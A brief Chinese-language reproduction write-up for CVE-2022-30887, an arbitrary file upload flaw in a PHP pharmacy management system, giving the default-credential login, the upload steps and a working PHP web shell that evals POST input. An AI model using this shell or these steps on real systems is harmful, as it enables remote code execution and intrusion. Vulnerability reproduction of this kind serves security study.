CVE-2022-30887漏洞复现 #

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口，客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库，并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞，进而导致任意代码执行。

找到作者的源代码，使用默认的账号密码登录（账号为作者邮箱，密码为作者名），登录进去以后，在添加药品里面直接上传shell，然后访问图片地址即可。 shell文件内容：

<?php
	echo "hello shell";
	eval($_POST['cmd']);
?>